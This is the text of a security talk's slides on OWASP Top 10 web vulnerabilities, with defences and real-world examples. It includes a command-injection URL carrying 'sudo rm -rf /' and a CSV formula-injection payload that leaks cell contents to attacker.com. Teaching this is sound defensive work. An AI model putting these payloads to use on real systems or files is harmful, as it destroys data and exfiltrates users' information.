Let’s talk Security Understanding, Exploiting and Defending against Top Web Vulnerabilities Dheeraj Joshi djadmin.in 

About Me I find security vulnerabilities for fun & swag and I wear White Hat. Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, CloudFare, Intuit, Groupon, etc. What makes me happy? 

Security - Into The Details ● Owasp’s Top 10 Vulnerabilities ○ Explain ○ Impact ○ Defense ○ Real examples (External + Internal) ● Demo - RCE ● Q & A 

Why should Startups Care about Security? Startups & SMEs are impromptu for cutting corners. One of the first things they cut is ‘Security'. 

No content

HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS The Shutdown 

OWASP Top 10 And Beyond 

INJECTION 

PREVENT INJECTION ● For databases use prepared statements ● Whitelist inputs wherever possible ● Sanitize inputs (use filter extension) ● Don’t trust user input and always verify! 

Example Google Command Injection We can include any command in the URL below https://console.cloud.google.com/home/dashboard? project=;sudo rm -rf / Found by an Indian Security Researcher (S. Venkatesh) 

Exploiting ‘Export as CSV’ functionality Formula Injection =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information") Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -) If victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to attacker website, which may include other users’ sensitive information. 

BROKEN AUTHENTICATION AND SESSION MANAGEMENT 

MITIGATION ● Enforce strong password policy ● Require periodic reset of password ● Use 2 factor authentication ● Use SSL and secure flag on cookies ● Don’t neglect failed-login detection & tracking ● Only use httpOnly cookies 

CROSS SITE SCRIPTING - XSS ● XSS attack users ● “Javascript Injection” ● Exploits can be bad, really bad.. 

What is XSS? Typical Reflected XSS 

Stored XSS 

DOM XSS 

Protect Yourself ● Use filter extension to filter inputs ● Ensure that outputs are HTML encoded ● Don’t reinvent the wheel ● Don’t consider any part of the request as being “safe” 

ngBind attribute $sanitize - service in module ngSanitize Sanitizes an html string by stripping all potentially dangerous tokens. 

INSECURE DIRECT OBJECT REFERENCES 

Scenario / Exploit 1) First, an attacker signup for an account and request ”forgot password”. 2) You will receive a link : https://vimeo.com/forgot_password/[user id]/[token] 

Prevention ● Low level access controls ● Prevent user input in file/URL access commands ● No unsanitized input to execution commands 

SECURITY MISCONFIGURATION 

PREVENTION > CURE ● Perform periodic security checks using automated tools ● Static Code Analysis ● Example : Hardening MySQL, Directory Listing, Auth Tokens 

SENSITIVE DATA EXPOSURE ● Exposed PHP error messages ● Unencrypted sensitive data storage ● Not using SSL ● Example: a sensitive token should not be sent to external websites (Fitbit) 

MISSING FUNCTION LEVEL ACCESS CONTROL ● Valid input processing without access controls ● Decentralized access control layer ● Example : Profile email address not validated (Github), S3 configuration 

● Don’t perform data changes on GET ● Use secure (csrf) tokens for POST ● Impact : Real bad, attack users ● Example : Dropbox, CodeSchool CROSS-SITE REQUEST FORGERY (CSRF) 

● Not keeping libraries up-to-date ● *cough*Wordpress*cough* ● Example : Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE) USING COMPONENTS WITH KNOWN VULNERABILITIES 

UNVALIDATED REDIRECTS AND FORWARDS ● Header Injection ● JavaScript Parameter Injection ● Reliance on HTTP_REFERER ● Abuse window opener (Facebook) 

Example : Dropbox Open Redirect in v1 API 

Remote Code Execution 

The solution ● Reset all passwords and keys ● Remove backdoors (not easy) OR Destroy everything?? 

Thank you References : ● https://www.owasp.org ● https://djadmin.in/pwn/ (tools)